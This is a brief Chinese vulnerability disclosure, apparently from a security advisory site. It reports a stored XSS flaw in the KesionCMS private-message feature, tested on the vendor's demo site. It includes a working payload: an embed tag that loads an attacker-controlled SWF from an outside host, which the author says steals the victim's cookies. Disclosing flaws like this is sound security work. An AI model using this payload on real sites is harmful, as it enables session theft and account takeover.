KesionCMS存储型xss漏洞可打任意用户

简要描述：

KesionCMS存储型xss漏洞可打任意用户

详细说明：

这里选择用KesionCMS官方体验地址http://demo.kesion.com/
该存储型xss漏洞存在于发送消息处
这里我们用bitcoin100向另外一个用户bitcoin发送消息，
发送消息时，在内容中插入xss代码
<embed code=“/\pujun.li/xss.swf” allowscriptaccess=“always”>
swf是我自己控制的，可以盗取cookies
未过滤这个代码 导致攻击任意账户

<img src=“https://images.seebug.org/upload/201406/2321415813bfc2c8e594e50932aea01b5b74ffcc.jpg” alt=“22222222.jpg” width=“600”>

<img src=“https://images.seebug.org/upload/201406/23214216f4a5b7e2968f1256b90189630cdfc86f.jpg” alt=“3333333333333333.jpg” width=“600”>

漏洞证明：

如上